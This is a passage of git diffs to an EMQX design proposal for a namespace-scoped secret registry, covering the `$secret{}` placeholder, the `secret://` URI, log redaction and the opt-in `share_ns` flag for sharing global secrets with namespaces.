+    must never render that value onto the wire.
+  * A global config resolves only global secrets and never a
+    namespace-owned secret, even when the name exists only in a
+    namespace.
+  * No cross-scope qualified form exists: `$secret{global::name}` /
+    `secret://global/name` from a namespaced context do not resolve
+    (they are treated as an unknown name or a config-validation
+    error, per implementation choice — assert whichever is chosen).
+  * Authn scoping: a **namespaced** HTTP authenticator resolves its
+    `$secret{...}` against its own namespace even though the
+    connecting client has no `tns` yet (and even when the client's
+    `tns` is initialized *from* this authentication). A **global**
+    authenticator resolves against global. A regression that keys
+    resolution off the client's unresolved `tns` must fail this test.
   * A namespaced admin cannot create, read, update, delete, or
-    **list** another namespace's secrets; a global admin can act on
-    any namespace via `?ns=`.
+    **list** another scope's secrets (another namespace's *or* the
+    global scope's); a global admin can act on any namespace via
+    `?ns=`.
   * Per-namespace cap is enforced per namespace, not cluster-wide.
   * `'namespace.delete'` removes exactly that namespace's secrets and
-    leaves global ones intact; re-running the cleanup is a no-op.
+    leaves global and sibling-namespace ones intact; re-running the
+    cleanup is a no-op.
 * HTTP-header byte check composition: a stored secret whose value
   contains CR / LF is accepted at storage time (UTF-8-only check
   passes), but rejected at the HTTP bridge connector when used as a
@@ -716,14 +806,57 @@ can run a Vault Agent sidecar that templates a HOCON file containing
 ### Returning the value via GET
 
 Considered: allow `GET /api/v5/secrets/{name}` to
-return the value to an operator with sufficient privilege. Rejected:
-once read-back exists, the boundary "operator can configure bridges
-but does not know the secret value" disappears. Read-back also makes
-the audit story muddier -- "did this operator read this secret"
-becomes a question whose answer must be logged, where today the
-answer is uniformly "no." Rotation is the rotation path; if an
-operator needs the value to put it somewhere else, they should
-store it themselves.
+return the value to an operator with sufficient privilege. Rejected,
+though for narrower reasons than one might first assume. It is *not*
+rejected to preserve a "configure but cannot read" boundary — no such
+boundary exists (see "Security model: reference implies disclosure").
+It is rejected because keeping read-back uniformly disabled (a) keeps
+plaintext secrets out of one more egress surface — API responses, and
+their proxy / gateway / browser-history trail — reinforcing the
+at-rest exposure reduction that *is* the feature's value, and (b)
+keeps the audit story crisp: "did any operator read this secret over
+the API" is uniformly answerable as "no," with disclosure occurring
+only through the referencing paths that already carry it. Rotation is
+the rotation path; an operator who needs the value elsewhere should
+store their own copy.
+
+### Cross-namespace secret sharing (fallback, `shared_ns` flag, or allowlist)
+
+Considered, across several shapes and the subject of the review that
+prompted this revision:
+
+1. **Implicit fallback** — a namespaced reference to name `N` that
+   misses locally falls back to the global `N`. This was the shape of
+   an earlier draft.
+2. **Opt-in `shared_ns` flag** — a global secret is reachable from
+   namespaces only when a global admin marks it shared.
+3. **Per-namespace allowlist** — a global secret carries the list of
+   namespaces it is offered to.
+
+All three are rejected for v1, on one root observation: **referencing
+a secret is equivalent to reading its value** (see "Security model:
+reference implies disclosure"). A tenant who can reference a secret in
+a resource they control can render it to an endpoint they control and
+read it off the wire. So any mechanism that lets a namespace reference
+a global secret is, precisely, a mechanism that discloses that
+secret's value to the namespace's administrators — regardless of the
+no-read-back API.
+
+That reframes the design question from "how do we let tenants
+*reference but not read* a shared secret" (which is impossible) to
+"do we want a way to *disclose* a global credential to specific
+tenants." For v1 the answer is no: cross-scope reference does not
+exist in any form. Shape 1 is the most dangerous (silent, name-guess
+exfiltration) and is out. Shape 2's `shared_ns` reads as a
+view-protection but is really an all-tenants disclosure switch — its
+name over-promises, so we do not ship it. Shape 3 is the *honest*
+form of the feature (targeted disclosure) but adds a cross-namespace
+ACL surface that must stay consistent across namespace lifecycle, for
+a use case ("one credential shared to some tenants, rotated once")
+that has not yet been asked for. If that need materializes, shape 3
+is the way to add it later — as an explicit *disclosure* grant, named
+and documented as such — without invalidating stored data (the
+strict-scope model is its zero case).
 
 ### Allowing the placeholder in MQTT topics and payloads
 

--- a/active/0038-secret-registry.md
+++ b/active/0038-secret-registry.md
@@ -8,10 +8,10 @@
   disclosure, so secrets are reachable only within their own scope (namespace
   or global), with no fallback in either direction
 * 2026-07-24: @zmstone Reintroduce namespace→global sharing via a per-global
-  `share_ns` flag (default true): a namespaced reference falls back to a global
-  secret when that global secret is marked shareable. Global→namespace and
-  sibling-namespace resolution remain forbidden. `share_ns = false` keeps a
-  global secret tenant-invisible
+  `share_ns` flag (default **false**, opt-in): a namespaced reference falls back
+  to a global secret only when that global secret is explicitly marked
+  shareable. A global secret is tenant-invisible by default. Global→namespace
+  and sibling-namespace resolution remain forbidden
 
 ## Abstract
 
@@ -39,25 +39,26 @@ moment the template is used.
 Secrets are scoped: a secret is owned by the scope of the principal
 that created it — a namespace, or global. A namespaced reference
 resolves against its own namespace first, then falls back to a global
-secret **only if that global secret is marked shareable** (`share_ns`,
-default true). A global secret with `share_ns = false`, and every
-namespace's own secrets, stay private to their scope. A global
-configuration never resolves a namespace's secret, and one namespace
-never resolves another's — so the single cross-scope path is
-namespace→shareable-global, and it runs one way.
+secret **only if that global secret is explicitly marked shareable**
+(`share_ns`, default **false**). A global secret left at the default,
+and every namespace's own secrets, stay private to their scope. A
+global configuration never resolves a namespace's secret, and one
+namespace never resolves another's — so the single cross-scope path is
+namespace→shareable-global, it is opt-in, and it runs one way.
 
 This shape follows from one observation. Because a secret is resolved
 by rendering it into outbound bytes, and the principals who reference
 secrets are the same principals who choose where those bytes go, the
 ability to *reference* a secret is equivalent to the ability to *read*
-its value. Marking a global secret shareable is therefore a deliberate
-decision to disclose its value to every namespace's administrators;
-`share_ns = false` is how a global secret is kept tenant-invisible.
-The no-read-back API bounds exposure of secrets at rest (config dumps,
-backups, logs) but is not an access-control boundary between "can
-configure" and "can learn the value"; cross-scope isolation is
-enforced by non-reachability, which `share_ns = true` deliberately
-opens for a single global secret at a time.
+its value. Marking a global secret shareable (`share_ns = true`) is
+therefore a deliberate decision to disclose its value to every
+namespace's administrators — which is why the default is private: a
+global secret is tenant-invisible unless an operator opts it into
+sharing. The no-read-back API bounds exposure of secrets at rest
+(config dumps, backups, logs) but is not an access-control boundary
+between "can configure" and "can learn the value"; cross-scope
+isolation is enforced by non-reachability, which `share_ns = true`
+deliberately opens, one global secret at a time.
 
 ## Motivation
 
@@ -131,7 +132,7 @@ Record:
 {emqx_secret,
    key         :: {?global_ns | binary(), binary()},  %% {Scope, Name}
    value       :: binary(),      %% raw bytes, UTF-8 well-formed
-   share_ns    :: boolean(),     %% global secret reachable from namespaces? default true
+   share_ns    :: boolean(),     %% global secret reachable from namespaces? default false
    description :: binary(),      %% operator-supplied free-form note, optional
    created_at  :: integer(),     %% monotonic millis
    updated_at  :: integer(),     %% monotonic millis
@@ -141,9 +142,9 @@ Record:
 
 The owning scope (`?global_ns` or a namespace) is the first element
 of the key. `share_ns` governs whether a **global** secret is
-reachable from namespaces by fallback (default `true`); it has no
-effect on a namespace-owned secret, which is never shared into a
-narrower scope. `extra` is an empty map reserved so later versions can
+reachable from namespaces by fallback (default `false` — sharing is
+opt-in); it has no effect on a namespace-owned secret, which is never
+shared into a narrower scope. `extra` is an empty map reserved so later versions can
 add fields without a schema migration. See "Resolution" and
 "Namespace scoping and isolation" below.
 
@@ -407,7 +408,7 @@ Endpoints:
   "share_ns": true }`
   Creates a new secret in the caller's scope. Errors on name
   collision within that scope. `share_ns` is accepted only for global
-  secrets (defaults to `true`); it is rejected for a namespaced
+  secrets (defaults to `false`); it is rejected for a namespaced
   create.
 * `GET /api/v5/secrets`
   Returns a paginated list of `{ name, description, scope, share_ns,
@@ -559,9 +560,9 @@ relative to the scope of the *configuration that contains it* (see
   On a hit the namespace's own secret is used — a namespace-owned
   secret **shadows** a global one of the same name.
 * On a miss, resolution falls back to `{?global_ns, N}` **only if
-  that global secret is marked `share_ns = true`** (the default). A
-  global secret with `share_ns = false` is invisible to the fallback,
-  exactly as if it did not exist.
+  that global secret is explicitly marked `share_ns = true`**. Sharing
+  is opt-in: a global secret at the default (`share_ns = false`) is
+  invisible to the fallback, exactly as if it did not exist.
 * A reference evaluated in the **global** scope resolves
   `{?global_ns, N}` **only** — there is no global→namespace fallback.
 * On a final miss the strict-fail behavior described earlier applies
@@ -576,32 +577,36 @@ crosses a scope boundary. A namespace never resolves another
 namespace's secret, and a global configuration never resolves a
 namespace's.
 
-**Why a fallback, and why default-shareable.** The common operational
-case is a single backend credential used by both a global pipeline
-and one or more tenants' pipelines — e.g. a multi-tenant target
-system whose API key authenticates a global authn hook *and* is
-required by each namespace's message-forwarding action (the review
-scenario that prompted this revision). Without fallback, every
-namespace admin has to be handed a copy of that credential to store
-in their own namespace; rotation then becomes N-touch across
-namespaces, and — because referencing a secret already discloses its
-value — those copies grant the tenant admins nothing they would not
-already obtain by referencing a single shared original. Fallback
-removes the copy sprawl without changing who can read the value.
-Default `true` optimizes for that common case; `share_ns = false` is
-the explicit opt-out for a global secret that must stay invisible to
-tenants (the "secret hidden from namespace users" case raised in
-review).
+**Why a fallback at all.** The operational case it serves is a single
+backend credential used by both a global pipeline and one or more
+tenants' pipelines — e.g. a multi-tenant target system whose API key
+authenticates a global authn hook *and* is required by each
+namespace's message-forwarding action (the review scenario that
+prompted this revision). Without fallback, every namespace admin has
+to be handed a copy of that credential to store in their own
+namespace; rotation then becomes N-touch across namespaces, and —
+because referencing a secret already discloses its value — those
+copies grant the tenant admins nothing they would not already obtain
+by referencing a single shared original. Fallback removes the copy
+sprawl without changing who can read the value.
 
-**The security cost, stated plainly.** Because reference implies
+**Why the default is nonetheless `false`.** Because reference implies
 disclosure, `share_ns = true` on a global secret discloses its value
 to the administrators of **every** namespace — any of them can
 reference it (its name is listed to them, not guessed; see "API
-surface") in a resource they control and render it out. Mark a global
-secret shareable only when disclosure to all tenants is acceptable.
-This is a coarse, all-namespaces switch; a *targeted* "share to these
-namespaces only" grant is a possible future refinement, and
-`share_ns` is its all-or-nothing zero case (see "Declined
+surface") in a resource they control and render it out. Fallback is
+therefore convenient but not free, so it is off until an operator
+turns it on: a global secret is private to the global scope unless
+someone deliberately marks it shareable. The default protects the
+credential that was *not* meant to be tenant-facing (the "secret
+hidden from namespace users" case raised in review); enabling
+`share_ns` on the genuinely-shared backend credential is a one-time,
+per-secret decision made by whoever already holds the value. Mark a
+global secret shareable only when disclosure to all tenants is
+acceptable. This is a coarse, all-namespaces switch; a *targeted*
+"share to these namespaces only" grant is a possible future
+refinement, and `share_ns` is its all-or-nothing zero case (see
+"Declined
 alternatives").
 
 #### The resolving scope is the configuration's, not the client's
@@ -911,13 +916,13 @@ considered and declined for v1:
 
 1. **Namespace→global fallback with no opt-out** — the shape of an
    earlier draft: any namespaced miss falls through to global
-   unconditionally. Rejected because it offers no way to keep a global
-   secret tenant-invisible; a name-guess from any namespace would
-   exfiltrate any global secret. `share_ns` (default `true`) keeps the
-   convenient default while restoring that control — a global secret
-   that must not be disclosed to tenants is marked `share_ns = false`,
-   at which point it is unreachable from and unlisted to every
-   namespace.
+   unconditionally. Rejected because it discloses every global secret
+   to every tenant with no way to hold one back; a name-guess from any
+   namespace would exfiltrate any global secret. The per-secret,
+   opt-in `share_ns` (default `false`) restores that control — a global
+   secret is unreachable from and unlisted to every namespace until an
+   operator deliberately marks it `share_ns = true`, so the credential
+   that was never meant to be tenant-facing stays private by default.
 2. **Per-namespace allowlist** — a global secret carries the list of
    namespaces it is offered to ("share to these tenants only"). This
    is the *honest, targeted* form of disclosure and the natural

--- a/active/0038-secret-registry.md
+++ b/active/0038-secret-registry.md
@@ -1,0 +1,525 @@
+# Secret registry for data-integration templates
+
+## Changelog
+
+* 2026-05-21: @zmstone Initial draft
+
+## Abstract
+
+This proposal introduces a cluster-wide secret registry: a small EMQX
+application that stores named byte strings, exposes a management HTTP
+API scoped under data integration, and surfaces those values to
+template renderers through a new placeholder syntax `$secret{<name>}`.
+The placeholder is resolved at render time and is elided from every
+trace and log path, so a bridge / action / rule configuration can
+reference an API token by name without that token ever appearing in
+debug output, audit logs, or error messages.
+
+The registry's only purpose is to be referenced from data-integration
+templates -- HTTP bridge headers / URLs / bodies, HTTP authn / authz
+request templates, webhook actions. It is not a general-purpose
+configuration store, not an MQTT publish payload source, and not a
+key-management service. Encryption at rest, automatic rotation, and
+secret-broker integration (Vault, AWS Secrets Manager) are explicit
+non-goals for v1.
+
+Read-back over the API returns metadata only -- the stored byte string
+never leaves the broker except as part of a rendered template at the
+moment the template is used.
+
+## Motivation
+
+EMQX data-integration features today expect operators to write secrets
+directly into bridge / action / authn / authz configurations. A
+deployment with twenty HTTP bridges sharing the same backend API token
+has that token replicated in twenty places. Rotation means twenty
+edits. Each of those config locations is also persistent in
+`cluster.hocon`, visible via the dashboard, included in `emqx ctl data
+export` artifacts, and surfaceable in any trace or debug log that
+renders the template.
+
+Three concrete pain points follow:
+
+* **Operational**: rotation is N-touch. Tooling to mass-update the
+  same value across configs is missing today and would be brittle if
+  added (matching by string equality across heterogeneous templates).
+* **Audit / governance**: an operator who needs to configure a new
+  bridge today must know the value of the shared API token. There is
+  no way to grant "you can reference the production token" without
+  also granting "you can read its value."
+* **Exposure**: rendered templates appear in client trace, in rule
+  engine debug output, and in HTTP request logs at the bridge level.
+  Today there is no opt-in mechanism for "render this token, but
+  redact it from any log line."
+
+A central, named registry of secrets paired with a render-aware
+placeholder solves all three. Operators store the secret once. Bridge
+configurations reference `$secret{prod_api_token}`. The renderer
+substitutes the value into the outbound bytes; the same renderer
+emits `$secret{prod_api_token}` (unsubstituted) into any trace or log
+record. Rotation is one HTTP PUT.
+
+## Design
+
+### Target release
+
+This proposal targets EMQX v7.
+
+### Component overview
+
+A new application `emqx_secret_registry` under `apps/` provides:
+
+* A cluster-wide mnesia / mria table storing `{name, value, metadata}`
+  triples. Replicated to all nodes via the same shard mechanism used
+  by existing config tables.
+* An HTTP API under `/api/v5/secrets/...` for create,
+  list, update (by overwrite), delete, and get-metadata. **The value
+  field is never returned by the API.** Read-back returns metadata
+  only.
+* A render-side hook integrated into `emqx_template` (and any other
+  template renderer that participates in data-integration paths --
+  `emqx_variform`, `emqx_placeholder` as applicable) that recognises
+  the `$secret{<name>}` token and substitutes it at render time.
+
+### Storage shape
+
+Table: `emqx_secret_registry` (mnesia, mria-replicated, on the
+configuration shard so it follows the same disk-copy semantics as
+cluster.hocon).
+
+Record:
+
+```
+{emqx_secret,
+   name        :: binary(),      %% primary key, ^[A-Za-z0-9][A-Za-z0-9_-]{0,62}$
+   value       :: binary(),      %% raw bytes, UTF-8 well-formed
+   description :: binary(),      %% operator-supplied free-form note, optional
+   created_at  :: integer(),     %% monotonic millis
+   updated_at  :: integer()      %% monotonic millis
+}
+```
+
+Constraints:
+
+* `name` matches `^[A-Za-z0-9][A-Za-z0-9_-]{0,62}$` (same alphabet as
+  `emqx_utils:is_restricted_str/1` used for client-attr names). 63-byte
+  cap. Names are case-sensitive.
+* `value` is at most 16 KiB. Stored as-is after a UTF-8 well-formedness
+  check. PEM-encoded private keys (newline-containing) are permitted.
+* `description` is at most 512 bytes, UTF-8, control-character-free
+  except whitespace.
+* The total number of secrets in the cluster is capped at 1024 (configurable;
+  see Configuration Changes).
+
+### Sanitization
+
+At storage time, validate:
+
+* `name` matches the regex above.
+* `value` is well-formed UTF-8 (via `unicode:characters_to_binary/1`).
+  Reject otherwise. This is a well-formedness check, not a
+  character-class check -- newlines are permitted in the stored value.
+* `description` rejected if it contains bytes 0x00–0x1F or 0x7F–0x9F,
+  except 0x09 / 0x0A (tab, newline) which are kept.
+
+At **use time** (i.e. when the renderer inlines a secret into an
+outbound byte stream), the consumer of the rendered output must apply
+its own context-appropriate validation:
+
+* HTTP header value: reject if it contains CR / LF / NUL. The header
+  byte check landed in `emqx_utils:http_header_byte_check/1` is
+  already in place; rendered output flowing through the HTTP bridge
+  connector and the HTTP authn / authz utils inherits it for free.
+* HTTP URL: reject, never use secrets in URL.
+* HTTP body: no additional check (operator is responsible for shaping
+  the body).
+* MQTT topic / payload template: `$secret{...}` placeholders are
+  **rejected at config-validation time** for these contexts. See
+  "where the placeholder is allowed" below.
+* Action / source / connector secret-typed config field (resolved
+  via `secret://<name>`): no additional check at the registry layer
+  -- the consuming connector (Kafka SASL, HTTP basic auth, MongoDB
+  credential, etc.) imposes whatever byte / encoding constraints
+  its underlying protocol requires, at its own use site.
+
+This split -- store as-given (UTF-8 only), validate at use site --
+mirrors how PEM keys flow through TLS configuration today and avoids
+constraining what shape an operator's API token may take.
+
+### Placeholder syntax
+
+A new template token `$secret{<name>}` is recognised by the renderers
+that participate in data-integration paths:
+
+* `emqx_template` (the main template renderer used by HTTP bridge
+  headers, URLs, bodies, and by `emqx_auth_http_utils`).
+* `emqx_placeholder` (the legacy placeholder substitutor used in
+  rule SQL `FOREACH`, rule action templates).
+* `emqx_variform` (the expression engine used in `client_attrs_init`,
+  `clientid_override`, etc.).
+
+In each renderer, when the substitution engine encounters
+`$secret{<name>}`, it:
+
+1. Looks up `<name>` in `emqx_secret_registry`.
+2. On hit, substitutes the stored byte string.
+3. On miss, the behavior is **strict-rendering-fail by default** --
+   the render call returns `{error, {unknown_secret, Name}}` and the
+   consumer (the HTTP bridge connector, the authn request builder,
+   etc.) treats this as a configuration-time error and aborts the
+   operation. Logging records `{unknown_secret, Name}` -- name only,
+   never any stand-in value.
+
+The renderer's debug / trace output paths use a separate code path
+that emits `$secret{<name>}` verbatim (unsubstituted) wherever a
+fully-rendered template would otherwise appear. This is the key
+invariant of the design: the renderer has two output channels (wire
+and log), and the secret never lands on the log channel.
+
+### Where the placeholder is allowed
+
+| Context | Allowed | Notes |
+|---|---|---|
+| HTTP bridge action: header value | yes | Primary use case. Bytes inherit the header byte check at the connector. |
+| HTTP bridge action: URL | yes | URL components are byte-checked at the connector. |
+| HTTP bridge action: body template | yes | Body shape is operator's responsibility. |
+| HTTP authn request: header / body | yes | Same template renderer; falls in for free. |
+| HTTP authz request: header / body | yes | Same. |
+| Webhook action template | yes | Same. |
+| Rule SQL `FOREACH`, `SELECT` payload shaping | yes | Body-shaping use case. |
+| MQTT topic template (rule republish, mountpoint) | **no** | No use case, and a topic appearing in audit logs would leak the secret. Reject at config-validation time. |
+| MQTT payload template (rule republish) | **no** | Same. Payloads on the broker should not contain backend-credential bytes by accident. |
+| `mqtt.clientid_override`, `mqtt.client_attrs_init.expression` | **no** | A clientid or attribute appearing in client log meta and being templated from a secret is a footgun. |
+| Listener / cluster / static config | **no** | Secrets are a runtime concept and should not feed bootstrapping configuration. |
+| Action / source / connector **password / API-key field** (typed `emqx_schema_secret:mk/1`) | n/a -- use the `secret://<name>` URI instead | These are HOCON secret-typed fields, not template strings; see the `secret://` section below. The placeholder is for template rendering, not for HOCON secret fields. |
+
+The disallowed contexts reject at configuration validation time --
+`{error, {secret_placeholder_not_allowed, <context>}}` returned from
+the schema check, no runtime surprise.
+
+### Rule SQL function `get_secret(<name>)`
+
+In addition to the placeholder syntax, a rule SQL function
+`get_secret(<name>)` is provided for cases where the secret value
+needs to participate in an SQL expression (e.g. HMAC-signing a
+payload, building a custom Authorization header value out of multiple
+pieces, or passing as one argument among many to another SQL
+function).
+
+```
+SELECT
+  payload,
+  hmac_sha256(get_secret('webhook_signing_key'), payload) AS signature
+FROM "events/#"
+```
+
+The function looks up the secret by name in the registry and returns
+the stored byte string. On miss, returns `undefined` (consistent with
+the rest of the rule SQL function surface) and the rule continues --
+typically resulting in a downstream `undefined` argument that the
+caller handles per its own semantics.
+
+**The placeholder is the preferred path; `get_secret/1` is the
+escape hatch.** Its drawback is structural: once the value is bound
+to a SQL variable or used as an argument to another function, it
+flows through the standard rule expression pipeline, which includes
+the rule debug / trace output. That output can be enabled per-rule by
+operators via the dashboard or REST API, and any debug log emitted
+while the rule is being traced will record the resolved value
+verbatim alongside the other intermediate expression results.
+The placeholder, by contrast, is special-cased in the renderer's
+log-channel formatter and is preserved as `$secret{<name>}` in every
+trace and debug path.
+
+Concretely, the difference shows up here:
+
+* `Authorization: Bearer $secret{prod_token}` in a bridge header
+  template -> trace log records the header template verbatim with
+  `$secret{prod_token}` unsubstituted. Wire sees the substituted
+  value.
+* `SELECT get_secret('prod_token') AS token` in a rule with debug
+  enabled -> trace log records `token = "abc123..."` (or however the
+  secret value renders) alongside every other SQL result. Wire sees
+  the value too, of course.
+
+For straight credential substitution into a bridge or action
+template, prefer the placeholder. Use `get_secret/1` only when the
+value must participate in an SQL expression that the placeholder
+syntax cannot express, and accept the trace-exposure trade-off --
+or disable rule tracing on rules that reference secrets.
+
+Documentation will lead with the placeholder, mention `get_secret/1`
+as the escape hatch, and call out the trace-exposure caveat at the
+point of first introduction.
+
+### `secret://<name>` for HOCON secret fields
+
+Action / source / connector configurations expose dedicated *secret*
+fields (passwords, API tokens, bearer tokens, etc.) that are typed
+through `emqx_schema_secret:mk/1`. Today those fields accept a raw
+string or a `file://<path>` URI; the URI form is resolved lazily by
+`emqx_secret_loader:load/1` at use time, and redaction in
+`emqx_utils_redact` already keeps the URI itself out of logs.
+
+We extend the same plumbing with a parallel `secret://<name>` URI
+that resolves against the registry:
+
+* HOCON parse / schema convert: `emqx_schema_secret:wrap/1` gets a
+  new clause matching `<<"secret://", _/binary>>`, producing
+  `emqx_secret:wrap_load({secret_registry, Name})`.
+* Lazy load: `emqx_secret_loader:load({secret_registry, Name})`
+  looks the name up in `emqx_secret_registry` and returns the bytes.
+  On miss, throws `#{msg => failed_to_resolve_secret, name => Name}`
+  with the same shape as the existing `failed_to_read_secret_file`
+  error. The caller (the connector / action start path) treats this
+  as a startup failure and surfaces it in the resource error state,
+  exactly as it would for a missing `file://` path.
+* Redaction: `emqx_utils_redact:do_redact_v/1` gets a new clause
+  matching `<<"secret://", _/binary>>` that preserves the URI in
+  serialized config dumps without expanding it. The URI itself is
+  not sensitive -- it names a registry entry; the value behind the
+  name is what we're hiding.
+* HOCON serialization round-trip: `source/1` produces
+  `<<"secret://", Name/binary>>` from the wrapped term, so config
+  exports and `cluster.hocon` materializations preserve the URI form
+  rather than the resolved value.
+
+Eligible fields: any field declared via `emqx_schema_secret:mk/1`.
+That means every existing password / token / API-key field in
+connector and authn / authz schemas inherits `secret://` support
+without per-field changes. The list is large enough that enumerating
+it here would rot quickly; the operative rule is "if the field is
+already `emqx_schema_secret:mk/1`, it supports `file://` today and
+will support `secret://` after this change."
+
+Worked example -- a Kafka producer connector's SASL password:
+
+```hocon
+connectors.kafka_producer.demo {
+  authentication {
+    mechanism = "plain"
+    username  = "emqx"
+    password  = "secret://kafka_prod_password"
+  }
+  ...
+}
+```
+
+At connector start, the password is resolved against the registry;
+log lines that today print `file:///etc/emqx/kafka.pw` would print
+`secret://kafka_prod_password` for the registry case. Rotation is
+the same `PUT /api/v5/secrets/kafka_prod_password` HTTP call --
+existing connector instances continue to use the cached resolved
+value until they restart (matching `file://` semantics). A separate
+"force-reload-secrets" administrative action can be considered later
+if hot rotation becomes a requirement; for v1 the reload model is
+"restart the resource that uses the secret," which is consistent
+with how `file://` works today.
+
+This gives the registry three coherent access surfaces, each
+matching the shape of its consumer:
+
+| Consumer | Access mechanism | Log behavior |
+|---|---|---|
+| Template-rendered output (HTTP bridge headers / URLs / bodies, authn / authz HTTP request templates, webhook templates) | `$secret{<name>}` placeholder | Placeholder preserved in trace / debug logs |
+| Rule SQL expression (HMAC, multi-input composition) | `get_secret('<name>')` function | Resolved value may appear in rule trace when tracing is enabled -- escape hatch only |
+| Connector / action / source / authn / authz **password / API-key field** (typed `emqx_schema_secret:mk/1`) | `secret://<name>` URI in HOCON | URI preserved in config dumps; resolved value never logged |
+
+### API surface
+
+Path prefix: `/api/v5/secrets`. The endpoints sit at the top level of
+the REST surface, not under any sub-namespace. The
+"data-integration-only" association is expressed through the API-key
+scope, not through the URL.
+
+API key scope: the endpoints are gated under the existing
+`data_integration` scope -- the same scope that already governs
+bridges, actions, connectors, and rules. Operators who already
+manage data-integration via API keys get secret management with the
+same scope grant. Dashboard role-based access maps to the same
+scope tag. Gating is enforced through the API-key scope-check layer
+introduced on release-60 (`emqx_mgmt_auth:check_scopes/2`).
+
+Endpoints:
+
+* `POST /api/v5/secrets`
+  body: `{ "name": "...", "value": "...", "description": "..." }`
+  Creates a new secret. Errors on name collision.
+* `GET /api/v5/secrets`
+  Returns a paginated list of `{ name, description, created_at,
+  updated_at }`. **The value is never returned.**
+* `GET /api/v5/secrets/{name}`
+  Returns `{ name, description, created_at, updated_at }`. **The
+  value is never returned.**
+* `PUT /api/v5/secrets/{name}`
+  body: `{ "value": "...", "description": "..." }`
+  Overwrites the existing secret. This is the rotation path.
+* `DELETE /api/v5/secrets/{name}`
+  Removes the secret. The renderer's strict-fail behavior applies to
+  any subsequent template render that references the deleted name.
+
+### Logging and tracing
+
+All log emissions involving template rendering must go through the
+log-channel formatter rather than substituting on the wire and then
+logging. Concretely:
+
+* Bridge debug log records `template = "Authorization: Bearer $secret{prod_token}"`,
+  not `template = "Authorization: Bearer abc123"`.
+* Rule engine trace records show `$secret{...}` placeholders verbatim.
+* HTTP authn / authz request logs (when enabled) record
+  `$secret{...}` placeholders, not the substituted value.
+* Audit log records secret-management API operations as
+  `{action, create|update|delete, name, actor}` -- never the value.
+
+### Backup / export
+
+`emqx ctl data export` and the corresponding REST endpoint exclude
+the secret registry by default. A future opt-in (`--include-secrets`,
+plus an encryption requirement) can be considered separately; for v1
+the registry is excluded outright. This must be wired explicitly into
+`emqx_mgmt_data_backup` -- forgetting to do so is the predictable
+foot-gun.
+
+`emqx ctl data import` accepts a backup that omits the secret table.
+If a backup containing a `secrets` table is presented and the running
+cluster also has secrets configured, the import fails closed with a
+clear error rather than merging.
+
+### Cluster replication
+
+The mnesia table sits on the same shard as other configuration data
+(`emqx_conf` shard or its equivalent on release-63 -- to be confirmed
+during implementation). This means:
+
+* All nodes in the cluster see all secrets.
+* A new node joining the cluster receives the secrets table as part
+  of the standard mria join.
+* Network partitions follow the same semantics as any other
+  configuration data -- mria's standard reconciliation applies.
+
+The secret registry does **not** require its own shard, its own
+quorum, or any cluster-wide RPC during render. Render-time lookups
+are local mnesia dirty reads.
+
+## Configuration Changes
+
+No defaults need changing for any existing config field.
+
+## Backwards Compatibility
+
+This is a pure addition. Existing configurations continue to work
+without modification.
+
+A bridge configuration that today has `headers = { Authorization =
+"Bearer abc123" }` is unchanged. The operator can choose to migrate
+to `headers = { Authorization = "Bearer $secret{prod_token}" }` after
+creating the secret, but is not required to.
+
+The strict-rendering-fail behavior on missing secrets means
+configurations referencing nonexistent secret names will fail closed.
+This is by design and aligns with the existing behavior for missing
+required template variables in HTTP bridges.
+
+## Document Changes
+
+* New documentation section under data integration explaining the
+  secret registry, the placeholder syntax, where it is allowed, and
+  rotation patterns.
+* Update the HTTP bridge / authn-http / authz-http documentation to
+  cross-reference the placeholder as the preferred way to template
+  credentials.
+* Update the `emqx ctl data export` / `data import` documentation to
+  note the registry exclusion.
+
+## Testing Suggestions
+
+* Common tests for the registry itself: CRUD via API; cluster
+  replication (write on node A, read on node B); name regex
+  validation; UTF-8 well-formedness; length caps; max-count cap;
+  scope check on the management API.
+* Rendering tests: `$secret{name}` substitutes correctly in each
+  allowed context; rejected at config-validation time in disallowed
+  contexts; missing-secret produces strict-fail; renamed secret is
+  picked up on next render.
+* Log / trace tests: every relevant log path (bridge debug, rule
+  engine trace, authn/authz request log, audit log) emits
+  `$secret{...}` verbatim and never the substituted value. This is
+  the most important class of test -- a regression here defeats the
+  whole feature.
+* Backup tests: `emqx ctl data export` produces an archive that
+  contains no secret values; `data import` rejects archives
+  containing a secrets table when the cluster already has secrets.
+* HTTP-header byte check composition: a stored secret whose value
+  contains CR / LF is accepted at storage time (UTF-8-only check
+  passes), but rejected at the HTTP bridge connector when used as a
+  header value. Verify the rejection path emits a log line that
+  identifies the secret by name but not by value.
+
+## Declined Alternatives
+
+### Rule function `get_secret(<name>)` as the *only* access surface
+
+Considered: expose only a rule SQL function and skip the placeholder.
+Rejected: a SQL function's return value flows through the standard
+rule expression pipeline, including the trace / debug output paths,
+so any rule with tracing enabled records the resolved secret value
+verbatim in log lines. There is no way to ensure redaction across
+every consumer of an SQL function's return because the function does
+not know its caller's logging context. The placeholder, by being a
+distinct lexical token recognised by the renderer, can be
+special-cased uniformly across every render code path, and is the
+preferred path for the common "interpolate credential into outbound
+header / body / URL" use case.
+
+We do ship `get_secret/1` as an escape hatch for the cases where the
+secret value needs to participate in an SQL expression (HMAC-signing
+a payload, composing a header value from multiple SQL inputs, etc.).
+See the "Rule SQL function `get_secret(<name>)`" design section for
+the documented trace-exposure caveat.
+
+### Encryption at rest with a master key
+
+Considered: encrypt secret values in mnesia using a master key
+configured via env var or HSM. Rejected for v1: this requires master
+key management, key rotation policies, and a recovery procedure for
+"lost master key, regenerate registry" scenarios. Filesystem-level
+encryption (LUKS, AWS EBS encryption, GCP persistent disk
+encryption) provides the at-rest property without adding key
+management to EMQX's surface area. Mention as a possible v2.
+
+### Vault / AWS Secrets Manager / external broker integration
+
+Considered: instead of (or in addition to) a built-in registry,
+support fetching secrets from external secret brokers at render
+time. Rejected for v1 on two grounds: it expands the surface area
+significantly (broker plugins, credential management for the broker
+connection, timeout / cache semantics for slow brokers, error
+handling for "broker reachable but secret missing" vs "broker
+unreachable"), and it shifts the operational model from "EMQX is
+self-contained" to "EMQX has a hard runtime dependency on an
+external secret service." Operators who want Vault-backed secrets
+can run a Vault Agent sidecar that templates a HOCON file containing
+`emqx_secret_registry` CRUD calls and re-applies on rotation.
+
+### Returning the value via GET
+
+Considered: allow `GET /api/v5/secrets/{name}` to
+return the value to an operator with sufficient privilege. Rejected:
+once read-back exists, the boundary "operator can configure bridges
+but does not know the secret value" disappears. Read-back also makes
+the audit story muddier -- "did this operator read this secret"
+becomes a question whose answer must be logged, where today the
+answer is uniformly "no." Rotation is the rotation path; if an
+operator needs the value to put it somewhere else, they should
+store it themselves.
+
